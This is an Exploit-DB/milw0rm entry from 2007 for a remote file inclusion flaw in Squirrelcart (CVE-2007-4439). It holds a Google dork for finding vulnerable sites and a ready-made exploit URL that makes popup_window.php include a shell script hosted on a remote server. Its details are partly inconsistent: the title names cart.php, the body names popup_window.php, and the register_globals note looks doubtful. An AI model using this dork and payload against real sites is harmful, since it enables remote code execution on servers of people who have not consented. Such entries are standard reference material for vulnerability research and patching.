Squirrelcart <= 1.x.x - cart.php Remote File Inclusion Vulnerability

2007-08-19T00:00:00
ID EDB-ID:4295
Type exploitdb
Reporter ShaiMagal
Modified 2007-08-19T00:00:00

Description

Squirrelcart <= 1.x.x (cart.php) Remote File Inclusion Vulnerability. CVE-2007-4439. Webapps exploit for php platform

                                        
                                            Title           : Squirrelcart &lt;= 1.x.x Remote File Inclusion
URL             : http://squirrelcart.com/
Google Dork     : inurl:"/squirrelcart/" -squirrelcart.com
Author          : ShaiMagal

Vulnerable file : popup_window.php -&gt;* config.php*, line 13 - $site_isp_root = "blablabla";

Exploit         : squirrelcart//popup_window.php?site_isp_root=http://example.com/shell.txt?

notes		: register_globals = off is needed it seems.

# milw0rm.com [2007-08-19]